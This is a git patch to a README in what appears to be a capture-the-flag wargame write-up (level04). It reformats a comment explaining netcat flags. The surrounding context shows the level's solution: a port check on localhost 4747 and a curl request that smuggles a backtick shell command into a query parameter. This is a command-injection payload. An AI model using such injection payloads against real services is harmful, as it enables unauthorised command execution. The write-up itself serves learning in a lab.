From 304f297bca3ae7de7c83fb9d2c7845b914dbfc00 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 18:54:44 +0100 Subject: [PATCH] Update README.mdx --- level04/README.mdx | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/level04/README.mdx b/level04/README.mdx index e07e27a..03a059c 100644 --- a/level04/README.mdx +++ b/level04/README.mdx @@ -35,7 +35,8 @@ Solution ```b > nc -vz localhost 4747 - ^ v: verbose, z: scan if a port is open (scanning listening daemons) + ^ v: verbose + z: scan if a port is open (scanning listening daemons) Connection to localhost 4747 port [tcp/*] succeeded! > curl localhost:4747/?x="\`/bin/getflag\`"